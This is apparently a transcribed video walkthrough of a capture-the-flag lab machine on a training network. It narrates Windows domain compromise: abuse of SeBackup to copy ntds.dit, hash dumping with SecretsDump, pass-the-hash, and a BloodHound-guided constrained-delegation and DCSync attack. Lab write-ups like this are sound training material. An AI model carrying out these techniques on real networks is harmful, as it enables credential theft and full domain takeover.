thing we need is new pass, and we'll just do password 1. I thought I specified the old pass. Let's see, that did not work. Let's just do it this way. I must have screwed something up. I wonder if you do at 10.10.11.5. Okay, that's what I had screwed up. So I bet if we did a colon like that with the at, it would have worked. So password was successfully changed. So we should be able to log in. So I'm going to try and NxC here. And we'll put this as password 1. And valid password, but we did not log in. We can see if they can do a WinRM. And it looks like they can. So let's do evil winrm -i 10.10.11.15 or 5. -u, Liza Kazanof, P, password 1. And we get in. So let's do a whoami/all. And we have the SeBackup privilege. We have a few of these, like SE restore, backup, whatever. But this is the dangerous privilege. I'm going to Google exploit SeBackup because I can't remember all the commands off the top of my head. Hacking articles, there's 2 right here. Which one do we want to go to? What's this page look like? Let's not use that. Okay, this is talking about 3 ways. DiskShadow and Robocopy. We can do DLLs here. So if we wanted to upload 2 DLLs, we could. I'm not going to do that way just because Windows Defender is on. I don't know if it detects them. We could also potentially do it through WB admin, but I think the most common way is going to be DiskShadow. So we have to create a script that has this content in it. It explains exactly what it's going to do, but essentially it sets up a backup to E:, that then we can go into. So let's really quickly do this. Program data, cd www v backup.script, paste that. That looks fine. Let's do a curl 10.10.14.8, 8000 backup script. Do I have a server still listening? I don't think so. Python 3, HTTP server. Rerun this, save it to backup.script. Okay. So now that we have the script on the box, we can do the DiskShadow command. We named it something different. Backup script. There we go. And I don't know if that worked. I think we have something wrong. Set verbose on. I hope it's not like a UTF thing. Because this is what it should look like. Huh. Let's see. Does this have Y? No. Which one has Y: mounted? I think this one. Y:. Awesome. Let's try copying the script this way. Copy backup script, C:, program data. I'm just going to call it backup. That is bad. I wonder if like a cleanup script happened and killed my connection. Looks like that one's still alive. The password doesn't seem to be working, so we may have to redo the whole AD object step, which kind of sucks. Get AD user. It's taking a while. Did my VPN die? Ping 10.10.14.5. It looks like my VPN died. So I'm going to pause the video and get back to where I was. Actually, I realized my VPN probably didn't die. When I pinged it the last time, I did ping 10.10.14.5 instead of the right IP address, which was 11.5. So I don't know what is happening here. My WinRM just completely died on this box. I got back on LoRa. Let's see, get AD user filter star. Do we still have the deleted object? We do. But I don't think this password's working. Is this the one we did SMB password? No. Which window did we do that in? Probably here. Let's see. Let's try saying the password again. Authentication failure. Does not have that. Does not have that password. Let's just do the 80 object step again. Get 80 object, include deleted objects, filter is deleted equal to true. I have no idea what just started happening. I wonder if my clock just went just far enough out of sync where Kerberos started becoming a problem. Let's see. Reset. NTP Q 10 10 11 5. How do we set the date? Let's see. NTP set date. NTP date -s. See if this works. My time has definitely been changed. Let's see. Is this the right shell? I should have taken better notes. I see 80 recycle bin. So we can say deleted. Let's see. Copy this. New name. Liza test. SMB pass WD. This is weird. Rock U exclamation. Okay. So I think it was Kerberos that would stop me from logging in because the password did not change. It's weird that I also started having issues all at once, but it looks like everything is fine. Nothing had reverted. It was just a weird case of my time going out of sync and like everything going bad. Let's see, program data. You still have the backup file. So let's try this again. We were here. We copied that script. We do DiskShadow, back up. And it really doesn't like that file. Because we do have set verbose on. Back up. Let's see. We'll just call it B. And try catting each of these to a file. Because if this doesn't work, then I guess we're doing the backup the wrong way. And I should have read the entire article, but you digress, or I digress, or whatever the phrase is. This is definitely a pain. And I'm guessing once this file is done, it's going to be twice the size as the other ones. Yes, it is. And I say that because this is going to be UTF-16 encoded. So that's why it's twice. Maybe that's what made the difference. I don't know if that's better or not. It's not what the website showed. I expected to see more stuff, but cd e:, drive does not exist. We just do DiskShadow. Can't direct it. What is going on here? I am getting relatively confused. Let's try changing the encoding of B. So I'm going to do get content path B. I'm going to set the content to, I'm going to call it back because I don't know exactly what names I've used. I know I haven't used that. We'll say encoding ASCII. WinRM failed again. I'm not exactly sure what's going on with my WinRM connection. It is hanging. I'm pinging the box. Why won't this exit? PSEF grep evil WinRM. See kill -9 on Lisa. Okay. Date. I still look like my date is set far enough in the future. NxC. That's failing. Rock you. We did this with SMB and it told us the password is expired. Okay. Okay, so maybe it was restoring the object and it just kept a password. I have no idea what's going on. I'm guessing this is some type of self-healing script so people don't step on each other, but it's creating odd behavior. Okay, so I'm in. Let's go back to that set content command. cd program data. Do a dir. Okay. So maybe it was the line breaks in these. Maybe like Linux is only doing \n and Windows wants \r/n. That's the only reason I can think of that being like 9 bytes bigger, because that's probably like 9 lines. So we got an extra character per line. So that may explain this. Let's see. They do DiskShadow and Robocopy. What was that command? We do Robocopy next. This is it. That looks much better. So, well, this is really finicky with how you do encoding. I guess I'd recommend echoing and then setting the content. I'm not exactly sure, but that is something I just learned. I didn't realize how finicky it was. So CDE, and now we can robocopy this, and I'm guessing the next one's going to be a registry. Write protected. Let's see. Wonder if we need to copy this straight to our host. Come on, give me a shell back. It's still trying to copy. Let's go back, get a shell again. Do we still have E? We do. So what was that command we did? Like that. Let's copy to C:\program data. Is that going to work? It looks like it does. It's probably copying in a folder. Let's see. We did Robocopy. Now we want to do the reg save. So we'll save the HKLM system to C:\program data system. C:\program data. Let's see, what do we have? We have system. I don't have ntds.dit. Let's see. What if that was a folder is trying to copy? Copy Windows ntds.dit to here. Do this Robocopy again. Let's see, it was disk part. DiskShadow. Let's run this again. And then after we run it, don't know exactly what that's doing. Are there arguments of that? So source, C:\Windows ntds, C:\temp. Okay, let's do Robocopy, ntds.dit, C:\program data, ntds.dit, E:, Windows. I'm guessing the ntds is not a directory here. It looks like it is actually. Copy ntds.dit, program data, permission denied. So we may have to do something else. I don't want to do a type against that. Let's just run the command as they wanted to, but on C:. Maybe the issue was when we ran this, we were inside of the E drive, and that's why we couldn't write. Okay, that looks better. Yep, that was it. It was just the directory we were in when we were running the command. Okay, so now we have all the files. We just want to copy them back to our box. Let's see. Let's go to where our SMB server is, because I don't think this is mounted anymore, or is it? Awesome, it is. So we can cp C:\program data ntds.dit to here, and that should copy. And then we also need to copy the registry hive that we copied, which was system. So C:, system. Okay. So that's probably in the www directory now. It is. Let's move ntds and system up one directory, move that out of the web. And now I can do SecretsDump. I think it's local ntds.dit security. We probably need the system hive. So I don't think we grabbed everything. How is this doing it? We just did... Oh, we did system, not security. There we go. Helps if I specify the right files. So this did a secrets dump. So we just extracted the ntds.dit file. And this will have the administrator hash. This is going to be the latest one. And this should let us into the box. So let's do a... we can do nxcSMB 10.10.11.4 or 5u administrator p or hash that, and this should say pwned. It does. So let's do a ps exec. Oh, that's not gonna work. What's the other one? wmi exec. There we go. ps exec isn't gonna work because defender's on, and ps exec drops a file. wmi exec doesn't. So this one should have a better result. -h. I think we just specify the hash this way. At 10.10.11.5. It is -hashes. And there we go. So if we do a cd users administrator desktop dir, we can get root.txt. So that is the intended way to do this box. But not the end of the video, because there is an unintended solution that if you ran Bloodhound early on, that you probably would have found. You can skip the whole recovering the user out of the recycle bin step. That also enables you to skip the exploiting the backup privilege, because the AD recycle bin has GenericWrite over the domain, so you can do a constrained delegation attack. So let's show this unintended solution. And first, I want to show a different way you could have processed the hash. I'm trying to find out exactly where I have that mounted to. Where was that mount? Which tab? Was it here? Do I still have it mounted? cd/mount mem. It looks like I do. So I forget exactly where I have mounted this, but let's just go with it. When you mount the memory dump, we went into the py and then was it reg secrets and got the files that way, right? We did a cat security.txt. This required having a lot of the Python like PyPyKatz installed. I believe you could, even without PyPyKatz, if you just went into the registry, and then you have access to all the registry hives. So if we went into like HK local machine, it's going to let us like browse the registry, I believe. And we don't want to do this because this is treating like the registry as a whole directory. We just want it as a block object in order to use it with SecretsDump, right? So let's go over to the hive files. And then we have these. So we can do SecretsDump.py, and you can do SAM, find the SAM file. Where is that? I guess we can do system first. So let's do -system. Then the SAM is right here. And we can say security. And we give it all these hive files. We also have to specify the target, which is local. We get pretty much the same thing. We're missing that rocku password. So this is why when I did it this way, I missed it because I could recover the user, but not reset the password because I didn't see rocku exclamation point. And I don't think I attempted to crack these hashes. I don't know why I didn't, but I just didn't. And we have the dates they were set. And then you also have the NTLMs, right? So this is just another way you could have parsed the information. The key thing you need is just getting this pwned password, because this is going to be the user that has that dangerous write, right? Let's go back over to our box. So let's go here. Let's just go to new pane. I'm going to do passwords.text. Do we have that? We did not put the full password. So that should be fine. And now we want to install Bloodhound. I'm going to do that first before we collect the data because Bloodhound has recently changed a lot. I don't know. Well, maybe it's not recent, but it's new to me. So if we do GitHub, what was it? Bloodhound AD. I think this is where the normal repo is. And then we download that like binary that let us do like open up Bloodhound. That's like not being supported anymore. So if you want to do all the new cool things, you should use the Bloodhound Community Edition. And it's a little bit different because it uses Docker to set up, so it's no longer just a single binary. And I think I have some issues with my install process. It may not be the same on yours, but we'll see if it happens. So I'm going to clone this repo, and I probably should have still been root to do this. We'll do git clone. And I'm going to make my IPsec user an owner of this directory once it's there. So ch own IPsec -r Bloodhound. And the other downside to using this is the Bloodhound Python doesn't seem to be working with it. So we're going to have to use the sharphound ingester. So that's why I wanted to install this first to kind of explain that. So we go to Docker Compose and we can just do Docker Compose pull, I want to say. And this is going to pull everything. And then once we pull it, we can do a up, I think, period. Will let us get our command back. What is it? Let's see. Do they have an install quickly? Let's see. Compose pull. And then up. I want to say it's a period. You may have to do a -d as well. Let's see. Blowfish, no such service. Did we do what it said? Docker compose pull. Okay. Docker compose up. I don't think this is giving me my terminal back. I probably need to do a -d. Oh well, we'll leave this be. So this should start the Docker containers. So if we do Docker, let's go back into opt Bloodhound, examples, compose. We're missing one container. We're missing the Bloodhound container. Oh, there it is. I'm going to hold on 1 second. I just realized I screwed something up. I'm going to add the -d because I need everything up. And then we're going to remove it and do a -v to delete the volume. Because when you start Bloodhound up for the first time, it's going to randomly generate a password that becomes hard to pull if you don't do it right away. So down -v will turn the Docker composer or Docker files down and then also delete them. But the thing I want to do is go into Burp Suite and we're going to disable our proxy on 8080 because by default, Bloodhound's going to want to bind on port 8080. So that's why I had done that. But I'm just going to do the Docker compose up -d. It's going to spin it all up. Once these two containers are up, it should start the Bloodhound container. And that's going to be the one that actually has the password in it. So if we went to, let's see, Bloodhound.py, GitHub, if we go to this ingester, it's going to say it's only compatible with Bloodhound 4.2 and 4.3. Oh, wait. There may be a Python. Bloodhound Py tree, Bloodhound CE. So there's a branch here. I have not used this yet. Let's try this. We got to just switch the branch to Bloodhound-CE. Sweet. Let's do it live. I haven't tried this before. Let's see. We want to do Docker compose logs, then Bloodhound to get the container logs out of Bloodhound. If you just do Docker compose logs, it'll get for every container. And I don't think it like gets enough lines. Maybe it will. This is getting more than I expected. But sometimes I didn't see the password actually showing up here. So if we look for initial, we can see the initial password was set. So we can grab this. And then let's see. We want to do HTTP localhost 8080. We'll put that initial password in. And then the default email address is in this config. It's spam@example.com. That is a funny default email address. But now we can log into Bloodhound if we set our password. So copy this. And the password has to be 12 characters. So I'm going to do password 2024. If I can type. Reset. Let's see. That is what it is. Okay. So no data. So we have to get data now. And this is going to be a piece I have not done before. But let's try this out. We can do, delete that. We don't need that zip. Get pull. Okay. Get branch. We're on master. We'll do get check out. What is the branch name? Bloodhound-CE. Bloodhound-CE. Okay. I think we're on this. I'm just going to pull to be good measure. I think we're fine. So this should have set everything. Does this tell me we're on CE? It doesn't. I guess let's try it. Python 3, Bloodhound.py. And doesn't look like it's going to tell us. But, okay. So we'll say -ns, the name server 10.10.11. What was it? 5. DC, freelancer.htb. I'm going to also give it the domain name of freelancer.htb. And then I want to say we want to add zip and give it the credential. So we're going to use, let's use Mikasa's password. So we can go cat passwords. I love Aaron Yeager because this is the first account I think we got. So normally I run Bloodhound like as one of the very first steps. So I just want to show the data is available as any user because it generally doesn't matter who you run Bloodhound as. Grep mikasaAckerman, copy this, paste, and it looks like it's working. So when I had done this, I actually used the #pound.net binary just because I didn't pay attention to the whole README that said, if you want to use Docker CE, switch over to that branch. So now we have Bloodhound. Let's go back here and we can go to file ingest, upload file. And let's see, is that the file? Where are we? We're in opt.bloodhound.py. We're going to grab this file, upload, and it is currently ingesting. So take a little bit to ingest, probably about a minute. And then once it does, we'll be able to go over to the Explorer tab and play with it. Now, Bloodhound is a little bit different now if you can't tell. The interface has changed up. From what I tell, if you want to go look for the default queries, go over to ciphers. Then you can click the folder and you have most of them here, right? I couldn't find like shortest path from owned principals. Instead, you have things like this. And I don't think it's like, I think something's wrong with my copy because the images aren't working. I don't know why that is. But yeah, let's see. I want to see if our file has been ingested yet. Because I want to say the shortest path should look a little bit different. Let's see, my profile, download collectors. These are the supported collectors. Where is file ingest? It is save, layout, export. You run this. It definitely should be done by now. And no node. Probably administration. Okay. We have collected the data. And it is not behaving as I expected. I wonder if we set our account. Let's go Laura to domain admins. Query. Yes. Nothing. So I think a lot of edges are missing. Click here. A member of 4 groups. It is catching that. It's not getting the constrained delegation piece, though. Okay, that is weird. And I am definitely here. See, no tracking information with it. I'm actually going to rerun this real quick. Let's do a rm-rf on this. Going to reclone. And when I clone it, I'm going to specify the branch, just in case my checkout didn't work. I think I did it correct, but I am not positive. Because normally the Bloodhound Python just works flawlessly. So we'll do -b. So we specify the branch as we pull it. Bloodhound-ce. Okay, let's go. Let's see. We need to do a chown. Chown ipsec-r Bloodhound.py pip3 install Python 3 setup.py install sudo. Oh man, this is becoming a pain. Docker build dot. I just want to make sure like my local machine doesn't have an old version of Bloodhound Python that it's using. This is always the biggest pain, I think, with running just Python applications, is always getting a clean environment, right? So this running it out of this Docker file should ensure us that we're running the community edition. And sorry for that sloppy cut, but we have the container built now. When I did this Docker build, I probably should have done a tag to call it like Bloodhound ingester, because now I have to specify the image name when I try to run it, because we don't have any name here. At least I think I have to. So we're going to copy the image ID and say docker run. We'll do interactive, remove this sh. Does that run it? It does. Let's see. Can we mount? Let's do a -v. We'll say our working directory into /mount of the container. And that did not work, but oh well. We can just copy it afterwards. So let's do a, was it Bloodhound.py? What was the name? Mikasa. So I want to copy this. Let's just go here. Copy. Paste. I think we just say Bloodhound.py. Bloodhound Python is the argument. Paste this. And actually, I'm going to specify -c all. So we do all collection methods. Just in case maybe the default collection method wasn't getting the constrained delegation, this should definitely work. So if you ever wanted to run a clean install of the Bloodhound container, this is probably going to be it. And I'm guessing we were doing the community edition because, oh, never mind. This is probably just the computer name. Let's see. One query timed out. And maybe this host doesn't exist. But we have the file here. If I do a ls, we do have specified zip, right? I did. I don't know why I also have a user's file. That's a bit odd. But let's just do a docker cp Then we can say 2024-100. I'm getting, nope, that's not it. We want B65. This is the container name. And because I did the --rm flag, at least I think I did, I definitely don't want to turn the container down because it will delete all the data. So we'll copy this bloodhound.zip. And I'm also going to copy this users.json because I'm not sure why that didn't put it in the zip file. As you can see, not really an expert when it comes to Bloodhound. I'm just kind of playing as we go, especially with this new edition. So we want to go to home, ipsec, HTTP, Freelancer. And then I'm going to give it this. Well, user.text is 0 bytes, so we don't have anything there. Let's see, how big is this zip? This is 23977. Opt Bloodhound.py. Did I delete the zip here? I could have swore I had it. Maybe I deleted the zip. It has been uploaded. Doesn't give us any like hash of the file, so I don't know if anything's different. It is still currently ingesting. And I'm going to wait until it's done ingesting before we do anything, just because I'm getting paranoid that maybe just going to that selection page before it ingested is what screwed it up. So I'm going to pause the video. We'll probably wait a minute, and then I will refresh this page. And hopefully it says completed and we can move on. Okay, we have the duration. Actually took a minute here, so we took longer to process this. Maybe that's a good thing. If I go to Explorer, Cipher, let's do shortest path to domain admins. And hopefully it actually gives us a path instead of just, yeah, this is what I expected. So I'm guessing when I ran the Bloodhound.py, it was still pulling from my old one, right? So the shortest path isn't really going to help us too much. We can see we have some users, a member of account operators, and I don't think any of these we have as owned, right? We have Jay Green, Evelyn, Jay Martinez, and that. So let's just set our owned. We have Laura. And man, that is really ugly. We're getting a lot more data here. So this is definitely different, right? We have set 69 and 12 of these object controls, and we had none before. But we can add this to owned. We also have Mikasa. And I'm sure this should look prettier because there's probably a special like owned graphic there. But oh well. So glancing at this, it doesn't look like we have any as owned because I don't see that second. Oh, maybe this is. There we go. We have one. So this actually did work. So shortest path is going to show us we have Laura is a member of AD Recycle Bin that has GenericWrite over the DC. And this is going to be the host name dc.freelancer.htb. And we should add this to a host file. I probably should have done that way back when we did like impacket, because impacket told us the host name. If we did, or not impacket, NxC. NxC SMB 10.10.11.5. When we run this, it tells us the name is DC. So AD Recycle Bin has GenericWrite. If I click this, we can go over to Linux abuse, and it tells us what to do. We do a add computer, resource-based constrained delegation to add the action right. Then we can do a silver ticket. So we're going to try this attack out, but also we could go to pathfinding and then search for, let's go Laura to domain administrator. So we could do it this way as well. And it shows us the path. Laura, member of Recycle Bin, has write to the DC. From there, we can DC sync everything. So that's how you use the new Bloodhound, kind of. Hopefully you enjoyed that piece of the demo. Now let's go over and abuse this GenericWrite. So go Linux abuse. We're going to want to do this add computer. So we're going to copy this. Let's see. Do we have add_computer.py in our path? We do. Let's see. We probably don't need LDAP-S. We can say computer name. We're going to say, doesn't really matter what the computer name is because we're adding a computer to the domain. As long as we have the ability to add a computer, we can do this. So we're going to set the computer password to, would say, please subscribe. DC host is going to be DC Freelancer HTTP, domain, NetBIOS. We want to say this is also attacker system. I want to see. I think this is setting the domain NetBIOS. I'm pretty sure that's what that is. And then we need the user. So we'll say Freelancer HTTP. And what is our username? We can get rid of this Bloodhound data now. We don't need it. We definitely need to keep running Bloodhound, but that's in the background, so that's fine. Let's see. HTTP, Freelancer, cat users, grep floor, grab this. And then the password, it's going to be this pwned. Okay. That should be it. I'm really not sure if NetBIOS is domain, like the actual domain name or the host name we're adding of the computer. If it errors, then we know what to change, I guess. We have successfully added the machine attacker system. Okay. So now let's do our RBCD attack. So we want to do our computer that we added, attacker system, can delegate to the DC. So that is going to be dc.freelancer.htb. And then the username and password, we will put the thing we had before. Paste this. And account to modify does not exist. Did I forget? Maybe NetBIOS should be just the domain. Okay, let's go back to add computer. We'll say IPSEC. And then, oh wait, DC is not found. Freelancer HTTP. Let's try IPSEC real quick. Okay, so it's not finding the account we want to delegate to, the dc.freelancer.htb. Is that lowercase? Is this going to be a case thing? I don't think so. Windows normally isn't case sensitive. Delegate to. Maybe it's just DC $. Because that's the actual computer name. Okay, that's what it is. We can also do attacker system. I'm doing it for both just because I don't know if the domain NetBIOS made a difference. So this is me just testing it out and doing both of them. So now we can get the silver ticket. So CIFS, this is going to be DC Freelancer HTTP, impersonate, administrator, and then this is going to be not this account. We actually have to give it the computer name account we created. So this is why we create a computer and don't use a computer that's in the domain, because eventually we need to know the machine account password. So we can say, we'll do attacker system first. Okay, we have the CC cache. So now we should be able to DC sync. We could also use PyWhisker to log in, but we can just SecretsDump this. Does this have the exact syntax? It does. So we just pretty much do, what is it? Export, or we can say Caribou 5cc name equals administrator. I don't know if there's an underscore or not. That looks right to me. Python 3, or it's just SecretsDump. Then we say probably -K for Kerberos. Then we give it the no pass flag. We want to give it the DC IP. And then the user that we are. So Freelancer HTB, administrator at DC Freelancer HTB. This is what's in our ticket, right? So this looks like it is working. So start a remote registry, target system boot key, and now it's going to be dumping the hashes. So after this, let's try it with the IPsec computer just in case the NetBIOS does matter. I'm sure it does something. I just don't know exactly what it does. I think it's in the NetBIOS of the computer name, which it should just be the computer name. I don't know why it's saying domain inside of Bloodhound, right? But we can get the password right there. And now it's dumping the cache domain logins. I'm just going to let this finish, so we'll pause the video until this finishes. I don't know how long this takes. And my packet finished, but we eventually hit a error message. After we stopped remote registry, we have that, but it looks like everything worked. I really need to reinstall this operating system to get better, like fix all those errors. We have the SQL Express password right here that we never got before. Very solid password. If we had got the SQL Express password earlier, like if it was in that config file, the config file had a SQL Express password. It didn't have the current one, I should say. But if we had the current one, we may have been able to do a silver ticket as soon as we exploited the database. But since we never got it, we couldn't do that. And let's see, we got the hash here. So you could do that WMI exec that we showed a couple minutes ago. But let's now switch this up and delete the administrator, get ST. We're going to use IPsec. Please subscribe. There we go. We have generated again. We'll run it and see if we authenticate still. Target boot key. Sam, this is looking good. So we did authenticate. So in terms of exploitation, it doesn't matter in the slightest. However, it probably does make some type of difference when we look at the computer registration. So while that runs, I'm just going to go back here. And I think we can say like get AD computer. Does that work? IPsec, there we go. SAM account name, let's see. Is there like a property star? There we go. Net, no. I was hoping there was a net buyers. Let's see. DNS host name. This is looking fine. Let's see. The other computer was attacker system. SAM account name. CN. So I'm relatively confident we did not set the NetBIOS name of our computer. Wow. I don't know why this happens periodically, that my WinRM just dies. But let's just go back to this. What do we do? Packet, add computer, and search the documentation and see what NetBIOS actually means. So if we go to the hacker tools, Let's see. Does it talk about domain net BIOS? It does. Net BIOS where the computer will be. Okay. So this probably should just be Freelancer, I'm guessing. It's the net BIOS name of the domain where the computer is being added to, and it's useful when the forest handles multiple domains. So this is probably just making sure that you add the computer into the right domain, right? So if I just specified a parent domain and then it had a child or something, it may be added to the parent, not the child. So net BIOS seems like it just is a filter on the domain. And I'm guessing because it didn't exist, like the IPsec one didn't exist, so it just defaulted to the parent. So really, the net BIOS name probably isn't needed at all. Let's see, is this where we ran it? If we go back to add computer, let's see, domain net BIOS. Do we need this flag? IPsec 2. Let's see. I'm guessing we don't. Yep, we don't even need the domain net BIOS flag. So that's just, again, specifying what domain you want to be a part of if there are multiple domains. So that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.